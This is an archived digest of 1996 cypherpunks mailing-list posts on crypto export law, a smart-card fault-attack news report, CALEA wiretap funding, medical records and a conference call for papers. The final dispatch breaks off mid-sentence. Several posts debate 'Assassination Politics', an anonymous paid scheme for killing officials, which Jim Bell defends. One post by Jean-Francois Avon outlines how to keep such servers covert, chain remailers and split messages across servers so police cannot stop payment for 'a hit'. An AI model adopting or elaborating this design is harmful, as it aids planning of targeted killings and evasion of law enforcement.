Message-ID: <9609260757.AA12338@spibm02>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I'm trying to work up some _action_ here, any takers, German cpunks?
> 
there was action.
press relaeses were published, and the public prosecuter general
has been informed about the technical background.
latest news say that german providers stopped the blockage.
i'm awaiting what happens after restoration of 'radical 154'. :-)

rolf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brianh@u041.oh.vp.com (Brian Hills)
Date: Fri, 27 Sep 1996 01:23:28 +0800
To: cypherpunks@toad.com
Subject: FW: Internet Scam TRUE?
Message-ID: <m0v6H98-0002VUC@u041.oh.vp.com>
MIME-Version: 1.0
Content-Type: text/plain


This lexis-nexus is running around again, is this a true statement?

Or another hoax going around?
I had not seen any comments on this list yet.  

The person who forward this to me had not provided where this
originated from.

Thank You 
b
> > > 
> > > Subject: FW: Internet Scam
> > > Date: Thursday, September 26, 1996  
> > > 
> > > FYI
> > > 
> > > More on the Lexis-Nexis connection:
> > > 
> > > Subj: Internet Scam
> > > 
> > > Many of you have probably received a message lately regarding a
> > > company called Lexis which is distributing names, social security
> > > numbers, etc. to people over the internet for illegal use (i.e. to obtain 
> > > credit in
> > > your name).  The message advises you to call a number, give your name and 
> > > social
> > > security number, and they will take you off the list.
> > > 
> > >                        DON'T DO THIS!!
> > > 
> > > The scam is to have you call and give the info to them.  The social
> > > security office is advised of this and is investigating the company.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 27 Sep 1996 04:50:05 +0800
To: Brian Davis <jf_avon@citenet.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <199609261713.KAA02040@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 AM 9/26/96 -0400, Brian Davis wrote:
>On Wed, 25 Sep 1996, Jean-Francois Avon wrote:
>
>> On 25 Sep 96 at 5:59, Brian Davis wrote:
>> 
>> > I disagree that that will be the response, but you should be willing
>> > to allow one group of people to fight fire with fire.
>> 
>> But generally, it has been found a much better solution to fight fire
>> with water, and this is why I am not convinced of the ideological 
>> effectiveness of AP, although I don't doubt it's operationnal 
>> effectiveness at all.
>
>
>If by "operation effectiveness" you mean some people will be killed, I 
>agree.  I also agree with the fire/water comment (maybe in more ways than 
>one!); my comment related to my belief that AP-supporters shouldn't 
>complain about especially draconian measures taken against them by 
>governments, given their modus operandi.

I think you totally missed Jean-Francois' point:  Turn your last statement 
around, and that's how _I_ look at the operation of governments:  
"Government supporters shouldn't complain about especially draconian 
measures taken against them by AP, given their modus operandi."

I for one would welcome a debate on just such an issue.  Remember, to 
justify the status quo you need to defend not only the comparatively-free 
governments of a handful of western nations, but in fact each and every 
government on the face of the earth.

Don't think you can just say, "This government is sorta okay," because what 
I am proposing fixes all the other governments on earth.  You can't support 
the maintenance of an oppressive system most everywhere else, simply because 
(arguendo) they "sorta" got it right, here.  (And I'd argue against that 
last claim!)

Besides, I've long ago given up the idea that the leadership of the US will 
really, truly attempt to promote freedom around the world.  No, they won't.  
They will continue to support the thugs.  The problem they have with 
overthrowing the thugs is that "what goes around comes around," and they're 
well aware that they're gonna get kicked off their throne once the precedent 
is set with a few dozen foreign governments getting replaced.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 27 Sep 1996 04:38:35 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <v02130500ae7006e9897a@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Indeed it may not be practical to try such a program on current
>computers.  I've had thoughts for some time about an analogy where each
>person in a civilization represents a cell in a single brain, and so on,
>so perhaps AP is merely a portion of the program for this "brain".  As
>to what happens when you try to concentrate a disproportionate amount of
>the programming task into a few hands, that appears to be the situation
>we have now.

For an excellent high-level coverage of 'hive' behaviour in man and machine
see Kevin Kelly's, "Out of Control: the raise of neo-biological
civilization" (also has significant coverage of us cypherpunks),
Addison-Wesley, 1994, ISBN 0-201-57793-3.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 27 Sep 1996 02:20:11 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <9609251433.AB02026@cti02.citenet.net>
Message-ID: <Pine.BSF.3.91.960926104653.15830H-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Jean-Francois Avon wrote:

> On 25 Sep 96 at 5:59, Brian Davis wrote:
> 
> > I disagree that that will be the response, but you should be willing
> > to allow one group of people to fight fire with fire.
> 
> But generally, it has been found a much better solution to fight fire
> with water, and this is why I am not convinced of the ideological 
> effectiveness of AP, although I don't doubt it's operationnal 
> effectiveness at all.


If by "operation effectiveness" you mean some people will be killed, I 
agree.  I also agree with the fire/water comment (maybe in more ways than 
one!); my comment related to my belief that AP-supporters shouldn't 
complain about especially draconian measures taken against them by 
governments, given their modus operandi.

EBD

> 
> I will take that sentence only slightly out-of-(specific)-context and
> make a still pertinent remark about it:
>   	
> 	This is *exactly* what Jim Bell, because of his opinions,
> 	envision to do with the AP system.
> 
> 
> I find that absolutely hilarious!
> 
> jfa
> 
> Please reply by e-mail since I am not on Cypherpunks anymore.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 27 Sep 1996 02:46:06 +0800
To: cypherpunks@toad.com
Subject: Re: Newsgroup proposal: misc.anonymous
In-Reply-To: <Pine.LNX.3.95.960925223111.314A-100000@gak>
Message-ID: <v0300782cae70481d711d@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:51 pm -0400 9/25/96, Mark M. wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>
> In an effort to get anonymity and message pools more widespread, I think it
> would be a good idea to establish a newsgroup for anonymous message pools
>that
> would get the same distribution as any other newsgroup in the "big 8".  The
> "misc" hierarchy is probably the best place for such a newsgroup since it
> already carries groups like "misc.misc" and "misc.test".  Does anyone
>have any
> suggestions or objections?

I do know that there was an alt.anonymous.messages, or some such. Haven't
looked at it lately, but I don't remember too much traffic on it...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 27 Sep 1996 05:28:03 +0800
To: cypherpunks@toad.com
Subject: Call for Papers: The Economics of Digital Information and              Intellectual Property
Message-ID: <v0300783fae7054474ca0@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


MIME-Version: 1.0
Date:         Thu, 26 Sep 1996 00:13:30 -0400
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Alan Lewine <alewine@DCEZ.COM>
Organization: Representing Myself
Subject:      Call for Papers: The Economics of Digital Information and
              Intellectual Property
To: CYBERIA-L@LISTSERV.AOL.COM

John F. Kennedy School of Government
Center for Science and International Affairs
and
Center for Business and Government

Harvard Law School
Institute for Information Technology Law and Policy
Harvard University Library
Council on Library Resources
Coalition for Networked Information

The Economics of Digital Information and Intellectual Property

Cambridge, Massachusetts, USA

January 23-25, 1997

 First Announcement and Call for Papers

Harvard University is hosting this symposium to broaden and deepen
understanding of emerging economic and business models for
global publishing and information access and the attendant
transformation of international information markets, institutions, and
businesses. The goal is to provide managers in public, private, and
nonprofit sectors with a practical framework for developing
program strategies and assessing the efficiency and competitiveness of
new information markets and institutions. It will address
questions such as:

--What will be the principal pricing models for information in an
advanced global Internet?

-- How will pricing models be affected by different technological
factors and market environments?

-- What will be the relationships between classic production costs,
transaction costs, and the economic value of intellectual
property?

-- How will different pricing practices at lower layers affect the
pricing of information?

-- What are likely long-term trends and scenarios for different pricing
models? What will be the effect of bundling or unbundling of
information services?

-- How will changing cost structures change the allocation of rights
between authors and publishers and other intermediaries?

-- How will markets for complementary products and services affect the
pricing and use of information?

-- What are the policy implications of different pricing models?

-- How do these reflect policy values associated with different kinds of
information?

Background:

The rapid growth of the Internet and the World Wide Web is trans-
forming the way information is accessed and used in business,
education, and the home. New models for distributing, sharing, linking,
and enhancing information are appearing, often embodied in
software or infrastructure. No change is more dramatic than the shift to
user-initiated retrieval for text-based information
formerly distributed in the form of physical objects by
publisher-initiated manufacturing and delivery. A similar shift may be
underway for sound and video. However, the considerable differences in
bandwidth and storage requirements between text,
images, sound, and video may dictate different cost and pricing models
in the near and mid-term. As production and distribution
costs decline, transaction costs and the value of intellectual property
may assume greater prominence. On the other hand,
standards and software may work to substantially reduce transaction
costs over the long run. With barriers to entry reduced by
technology, information markets may become extremely competitive,
reducing margins and possibly lowering the economic value
of many forms of intellectual property.

The Internet and the World Wide Web are characterized by explosion of
information along with an explosion of new tools for
navigating information. Competition for attention intensifies as
companies extend their marketing, sales, and support functions into
the Internet. Useful or entertaining information may have greater value
in attracting customer attention in an increasingly
competitive marketplace for information. Accordingly, it has been argued
that information will be valued less as intellectual
property and more in terms of the access it provides to other markets
and the value it adds to relationships. As a practical
matter, copyright may be overshadowed by the growing use of contracts as
a means of both securing value and defining
expectations in continuing relationships. Positions in simple
distribution chains are likely to erode as a result of disintermediation
and intense competition. In particular, reduced production costs and the
desire to avoid residual transaction costs may force
vendors away from complex pricing models. For example, usage-based
pricing may give way to subscription pricing. Such
dynamics may lead to new institutional arrangements for managing
life-cycle costs of information, especially in small markets
where users are also producers.

Similarly, as production costs decrease, the costs of information may be
assimilated by the underlying infrastructure or assumed
by users. This trend may be seen in the pricing of online services and
in the massive volunteering of content on the World Wide
Web. The Web, including software and servers, enables editorial and
navigation functions traditionally performed by publishers and
libraries to be performed in increased measure by individual authors and
end users. Cost analysis in this environment may hinge on
identification and evaluation of critical bottlenecks -- with the
understanding that many technological limitations may be
short-lived. Congestion may lead to new methods of supplementing
point-to-point transmissions, such as caching, mirroring, and
satellite broadcast. These new mechanisms may raise intellectual
property and interconnection questions that may be addressed
both as business and policy issues. Congestion may also hasten the
implementation of type of service priority at either the network
or server levels. Negotiation over quality and scope of service may
become extremely complex, and vendors may be tempted to
price to as many dimensions of value as possible. However, simple
pricing models may have surprisingly strong appeal, as they
have had in the analog environment. Sequential distribution windows for
motion pictures illustrate the potential for simple price
differentiation in a technologically complex environment. Price
differentiation is now playing an increasingly important role in the
marketing of software and databases. In fact, there may be public policy
arguments for price differentiation, not only for reasons
of efficiency but to enable some of level of access for those who cannot
afford access under standard terms, just as public
libraries have offered access for those who could not afford to buy.


*****

The Information Infrastructure Project emphasizes communication and
sharing of insight among scholars and practitioners with
different skills and backgrounds. Papers should be written in a clear,
non-technical manner (technical appendices may be
permitted) for a mixed, interdisciplinary audience that will include
publishers, librarians, economists, lawyers, and policy-
makers.

Prospective authors should submit short abstracts for review and comment
as soon as possible. Extended abstracts or outlines
should be submitted by October 15, 1996, to ensure consideration for the
program. Acceptances of abstracts and outlines are
conditional pending receipt of a satisfactory draft by December 15,
1996. Papers and supplementary material will be published as
a volume in the Project's series with the MIT Press. Copyright
assignment is not required, and parallel publication of individual
papers in journals is encouraged.

Please send paper proposals and requests for subsequent announcements
to: iip@harvard.edu

Or send mail to:

Tim Leshan
Information Infrastructure Project
John F. Kennedy School of Government
79 John F. Kennedy St.
Cambridge, MA 02138
617-496-1389
Fax: 617-495-5776
leshan@ksgrsch.harvard.edu


--
Alan Lewine
http://www.dcez.com/~alewine/

"[I]n sex as in other areas of life, beware governmental regulation."
     --Richard Posner, "Sex and Reason" (1992)

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 26 Sep 1996 23:09:53 +0800
To: cypherpunks@toad.com
Subject: FLA_wed
Message-ID: <199609261208.MAA13283@pipe3.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-26-96. NYP: 
 
   "Potential Flaw In Cash Card Security Seen. Counterfeiting 
   a Risk, Say Bellcore Scientists." Markoff. 
 
      A potential security flaw has been discovered that might 
      make it possible to counterfeit many types of the 
      electronic-cash "smart cards" that are now widely used 
      in Europe and are being tested in this country, reports 
      a paper set to be released today. 
 
      The Bellcore researchers said that a smart card's 
      security could be breached by forcing the microchip in 
      the card to make a calculation error, whether through 
      sophisticated means like bombarding the card with 
      radiation or perhaps cruder methods like placing it in 
      a microwave oven. A mathematical formula they derived 
      could use this error to extrapolate the secret data that 
      authenticates the card when it is used. 
 
   ----- 
 
   http://jya.com/flawed.txt  (6 kb) 
 
   FLA_wed 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 27 Sep 1996 06:41:26 +0800
To: T Bruce Tober <octobersdad@reporters.net>
Subject: Re: LACC: Encryption and Japan
Message-ID: <199609261922.MAA10619@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:46 AM 9/25/96 +0100, T Bruce Tober <octobersdad@reporters.net> wrote:
>A few months ago I read an article concerning one of the encryption
>gurus (other than PZ) setting up a company in Japan to create a new
>encryption program as good as or better than PGP which since it was
>developed in Japan, wouldn't be subject to ITAR. 

Jim Bidzos of RSA did a contractual deal with NTT, who have produced
a chip with RSA and Triple-DES implemented on it.  I'm not sure the
details of the deal, but essentially it's a license to use the 
patented RSA technology.  It's not that it's better or worse than PGP;
it's hardware implementations of some of the building blocks PGP uses.

The real win of PGP was taking the pieces (RSA public key key-distribution
and signatures, hashing, and symmetric crypto (DES,Bass-O-Matic,IDEA)),
putting them together into one relatively usable package, and distributing it.
The Web Of Trust that you build out of the RSA signatures is also a win,
since it lets you build non-hierarchical key distribution, which is
especially valuable for non-government-approved lefties :-) as well
as letting you build hierarchical military-style approval if you want.
But that's all applications of the core technologies - NTT is providing
the core pieces that you can build that sort of thing out of.

The NTT deal means that non-US manufacturers can build crypto-phones,
crypto-faxes, crypto-wide-area-network-muxes, etc., without annoying
US local ordinances interfering.  If they use it widely, and a flood
of such products hit the US, ITAR becomes effectively dead, which may
help it become really dead.  And if they don't, you can at least
get somebody in Japan to build a crypto-virtual-private-WAN router
so your company's internal international email and phone network 
will be untappable.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 27 Sep 1996 07:05:07 +0800
To: cypherpunks@toad.com
Subject: Re: Where to write crypto?
In-Reply-To: <ae6eb71a050210041e74@[207.167.93.63]>
Message-ID: <52env6$5ij@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ae6eb71a050210041e74@[207.167.93.63]>,
Timothy C. May <tcmay@got.net> wrote:
>At 2:05 PM 9/25/96, s1113645@tesla.cc.uottawa.ca wrote:
>
>>Why go so far, when you can export crypto from Anguila or Canada. The
>                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>Are you _sure_ about what you say about Canada? After all, in nearly all
>defense- and crypto-related matters, they are essentially the 51st State.
>In fact, Canada is one of the places crypto may be exported _to_ from the
>U.S. without any license. So, export strong crypto into Canada and then
>invoke the "you can export crypto from...Canada" clause?
>
>I don't think so.

As far as I'm aware, the rule for Canada is this:

If it came from the US, it can only be exported back to the US.
If it did not come from the US, it can be exported to any "non-evil"
country ("evil" countries are ones like Libya).

Then there are rules for what "came from" means, which are less clear.
I've also heard "substantially modified": if software comes from the US
into Canada, and is "substantially modified" in Canada, it may be
exported.

   - Ian "having a vested interest in this topic..."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMkrjIkZRiTErSPb1AQHQXgP+KbGrV49JAe5VkGu9eSlPmKHJT9dsKTjr
bEd+CocV84xvqbRI6VNQkiUMF++aHcIenjzEwMVyln3pDDbbWt6ptFp24DlZhHha
9elzVZ0ecXo2wtqVQer28dL5cok6xSpny2Wz35jxiUe1SNjNBi71jJOvdlOD+aI9
vKcCb2jHECU=
=JZ8x
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 27 Sep 1996 07:32:11 +0800
To: "Jean-Francois Avon" <bdavis@thepoint.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <199609262012.NAA14242@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:27 PM 9/26/96 -0500, Jean-Francois Avon wrote:
>On 26 Sep 96 at 10:49, Brian Davis wrote:
>
>> If by "operation effectiveness" you mean some people will be killed,
>> I agree.  I also agree with the fire/water comment (maybe in more
>> ways than one!); my comment related to my belief that AP-supporters
>> shouldn't complain about especially draconian measures taken against
>> them by governments, given their modus operandi.
>
>I don't think that any of them will complain because they understand 
>the nature of it.  I think that Jim Bell (forgive me Jim...:) view 
>that there will be only limited retaliation from government is not 
>guaranteed at all.  As I said somewhere previously, the whole thing 
>will depend on how the authorities view AP as (non-) attackable.  
>
>Here is the post I wrote earlier:
>
>------- earlier post -------
>
>jim bell recently wrote:
>
>> Local police action against an AP organization would, of course, be
>> deterred by the prospect of naming anybody who would go after it,
>> and soliciting donations against them.  
>
>I don't agree here.  It would all be a matter of timing, unless the
>number of AP servers would be sprouting out faster than police forces
>would be able to destroy them.  You have to realize that if the money
>is seized, noboby will be willing to make a hit since the odds of
>being paid are not too good.  Just play the game "Command and Conquer"
>for a while and you'll see.  Money is fuel.  Don't run off of it!

Uh, okay, I didn't mean to suggest that attacks would be entirely 
eliminated.  (The term "deterred" really needed to be quantified there, even 
for a native English speaker.)

But my main point was that (as evidenced by Brian Davis' unwillingness to 
acknowledge that the people who run the system will engage in illegality to 
stop AP) there is a certain hesitancy on the part of the "ruling class" to 
abandon at least the facade of legality that they often promote.  

>

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 27 Sep 1996 04:51:58 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <9609261727.AA03280@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 26 Sep 96 at 10:49, Brian Davis wrote:

> If by "operation effectiveness" you mean some people will be killed,
> I agree.  I also agree with the fire/water comment (maybe in more
> ways than one!); my comment related to my belief that AP-supporters
> shouldn't complain about especially draconian measures taken against
> them by governments, given their modus operandi.

I don't think that any of them will complain because they understand 
the nature of it.  I think that Jim Bell (forgive me Jim...:) view 
that there will be only limited retaliation from government is not 
guaranteed at all.  As I said somewhere previously, the whole thing 
will depend on how the authorities view AP as (non-) attackable.  

Here is the post I wrote earlier:

------- earlier post -------

jim bell recently wrote:

> Local police action against an AP organization would, of course, be
> deterred by the prospect of naming anybody who would go after it,
> and soliciting donations against them.  

I don't agree here.  It would all be a matter of timing, unless the
number of AP servers would be sprouting out faster than police forces
would be able to destroy them.  You have to realize that if the money
is seized, noboby will be willing to make a hit since the odds of
being paid are not too good.  Just play the game "Command and Conquer"
for a while and you'll see.  Money is fuel.  Don't run off of it!

For that reason, I think that any AP server, *at the introduction of
the concept*  would have to be a covert operation.  Servers could come out in
public light when their number be large enough to warrant a
strike on anybody trying to eliminate them.  Same for the
publication of the name of the individuals operating the server.

To me, this seems obvious.  Comments?

To go on along that line, I had the idea that a specific piece of
software, a bit like Private Idaho, that would chain remailers but
that would be specifically designed to handle predictions, would
have be designed.

(Pardon my ignorance of the net here)

The server need not to be a unique address.  Actually, the
prediction and any accompanying documents could be splitted a la
Secure Split, and sent to N differents servers, M (<N) of which
would be required to re-assemble the original prediction.  This
assures that if one gets closed, the other can rebuild the message.

If thoses servers were set up on *large* machines servicing tens of
thousands of messages a day, preferably located at a busy remailer
location, any exchange of information between them to rebuild the
prediction at a central location would not be easy to track by any 
govt.

Comments?

----- end of earlier post -----
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultant
    physicists and engineers, LabView programming
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 27 Sep 1996 04:47:41 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Confessing to a felony"
In-Reply-To: <ae6f45b800021004a06e@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.960926133104.19315B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Timothy C. May wrote:

> At 2:03 AM 9/26/96, Black Unicorn wrote:
> >On Wed, 25 Sep 1996, Igor Chudov @ home wrote:
> >
> >> > >> Soon I am going to be going overseas to Japan, and I want to take
> >> > >> my notebook with me so I can keep up with everything, however, I have
> >> > >> encrypted my hard drive and usually encrypt my mail.  Is this in
> >> > >> violation of the ITAR to keep everything the same when I go over?
> >>
> >> Gentlemen, us customs does not give shit about what you take out
> >> on your diskettes.
> >>
> >> When I went to Russia recenty, I took PGP for DOS, and no one gave
> >> me any problem.
> >>
> >> IANAL
> >
> >Obviously not, you've just confessed to a felony.
> 
> So?
> 
> "Confessing to a felony" is meaningless, as I understand things. While BU
> is a lawyer, and I am not, I maintain "confessing to a felony" is
> meaningless without several necessary factors:

Mr. May is absolutely correct.  But let me discuss why I still think it's
dangerous.

> 
> a. interest by law enforcement that a crime has been committed and needs to
> be prosecuted

Interest by law enforcement is impossible to predict.  It can be driven by
politial winds, and by fancy as well as unlucky coincidence.  (The drug
dealer who is busted because the police respond to a fight 911 call at the
wrong address).  The law is not fair in this regard.  Prosecution is
always selective and all one needs is an administration decision (even by
some mid-level idiot at justice) and suddenly crypto export could be a
serious issue.

> 
> b. evidence that the "confession" can be backed up by other evidence
>

In the case of the export at hand, a passport record exists, and surely
the notebook exists.  Were I a prosecutor with a bug in my rectum, I would
think I had something of a case.

> c. common sense

This has never had anything to do with prosecution.  I wish it did.

> Thus, if even former prosecutor Brian Davis, when he was a prosecutor, were
> to have "confessed to a felony" (for example, saying a bad word on a forum
> where minors might be present, under the CDA, and before it was put on
> semi-hold), his colleagues would just have snickered, thinking him crazy.

There was once a day where confessing to sexual harassment or smoking 
something fishy would have caused this response.  Today it is grounds for
immediate dismissal.

> As to the felony status of taking PGP to Russia, I think it's not a felony.
> The "personal use" exemption in the ITARs certainly makes taking PGP to
> _Western_ Europe an OK thing. Whether Russia is still considered to be
> worthy of an "exemption to the exemption," as it were, is unclear to me.

Unfortunately these kind of exceptions are easily evaded when push comes
to shove.

> Mostly, I think U.S. Customs doesn't care.

If this is true, it is for two reasons.

1>  Because no one has yet told them to care.
2>  Because they find the regulation to difficult to enforce.

Start admitting that you have engaged in the conduct and those two factors
may quickly vanish.

Am I being cautious?  Of course.  Once upon a time it was ok to admit that
you left the country with tens of thousands in cash too.

> --Tim May
> 
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 27 Sep 1996 07:10:55 +0800
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: crypto anarchy vs AP
In-Reply-To: <199609221810.TAA00172@server.test.net>
Message-ID: <199609261906.OAA00239@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Beck said:
> Been reading the AP thread, and thought I'd donate some of my views.

> the Internet.  You'd just cause the government to panic, and this
> would have negative effects, it would take ages for them to calm down,
> and the laws they'd pass in the mean time would mean a near certainty
> of mandatory GAK as a condition to switching the Internet back on.
> (Before someone takes me to task for the impossibility of switching
> the Internet off, it all depends on the level of government panic.
> More specifically perhaps they would disconnect key backbones, and
> ISPs briefly while they rushed into effect a few presidential decrees
> outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets,
> etc.)

     This would be cutting their own throats. There is SO much commercial
and government traffic going across "The Net" that many businesses would 
scream bloody murder, and the government would have MASSIVE trouble with 
it's agenda.

> Libertarian governments, if they come, I think will be more easily,
> and more likely achieved via non-violent means.  I think it will be a
> much more gradual process, and that government power will just be
> gradually eroded as international businesses gain power, and borders
> become more open, trade more free, as travel becomes cheaper, and
> moving to another country becomes less of a hassle.  Telecommuting,

     A very nice pipe dream. You sir have entirely too much faith in
humanity. 

> Governments are currently flailing around trying to prolong the
> inevitable.  The fall out from this is beginning to annoy some people.
> If it annoys enough people soon enough that they vote in a Libertarian
> candidate for president in the next 20 years, crypto anarchy, and
> libertarian governments could be reached more quickly.  I'm not sure
> it will ever get that far though, because the more votes the
> libertarians get over the following years, the closer we get to
> libertarian anyway, because the government has to start adopting their
> policies to get the votes back.  (Much like the green movement, which
> once it started getting significant votes, and media attention, was
> pandered to by politicians of all parties.  They're all green now:-)

     They are TALKING green, but their actions aren't. This shows that
the "libertarianization" of the ruling party would be in talk only.
Unfortunately people vote THEIR pockets, regardless of why their pockets are
the way they are. They vote their fears as well. They will almost always
vote for politicos who claim "anti-crime" (more like "more-prisons") and
"anti-drug" (read "more inner city youth inprisoned"), and soon 
"anti-crypto" (which will be based on 4-horsemen hysteria). People,
being for the most part stupid and short sighted, will vote away thier 
rights, just as they have done for the last 200 years. 

     No, I am not the LEAST BIT fatalist about this. I am trying to 
fight it with the limited resources I have, but...


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 27 Sep 1996 08:33:16 +0800
To: cypherpunks@toad.com
Subject: Re: Medical Data
Message-ID: <199609262144.OAA19955@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:28 AM 9/25/96 -0500, Phil Fraering <pgf@acadian.net> wrote:
>Of course, one area where the doctor will continue to hold a patient's
>records, instead of the patient, due to the nature of the current system:
>
>Prescription medication.
>Of course, with the really big problems with this stuff, drug
>interactions, there's still no system for a doctor to find out what you're
>on thanks to another doctor. Which is why it's very important to always
>use the same pharmacist.

Pharmacists in the US use a nationwide system that keeps track of
who's using what.  Issues in a system like this include 
insurance-paid pharmaceutical plans and also tracking 
politically-questionable pharmaceutical purchasers.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brock N. Meeks" <brock@well.com>
Date: Fri, 27 Sep 1996 14:33:17 +0800
To: cwd-l@cyberwerks.com
Subject: CWD--Wiretap In the Night
Message-ID: <199609262154.OAA12076@well.com>
MIME-Version: 1.0
Content-Type: text/plain



CyberWire Dispatch // September // Copyright (c) 1996 //

Jacking in from the "Smoked Filled Room" Port:

Washington, DC -- Federal provisions funding the digital telephony bill
and roving wiretaps, surgically removed earlier this year from an
anti-terrorism bill, have quietly been wedged into a $600 billion
omnibus spending bill.

The bill creates a Justice Department "telecommunications carrier
compliance fund" to pay for the provisions called for in the digital
telephony bill, formally known as the Communications Assistance in Law
Enforcement Act (CALEA).  In reality, this is a slush fund.

Congress originally budgeted $500 million for CALEA, far short of the
billions actually needed to build in instant wiretap capabilities into
America's telephone, cable, cellular and PCS networks.  This bill now
approves a slush fund of pooled dollars from the budgets of "any agency"
with "law enforcement, national security or intelligence
responsibilities."  That means the FBI, CIA, NSA and DEA, among others,
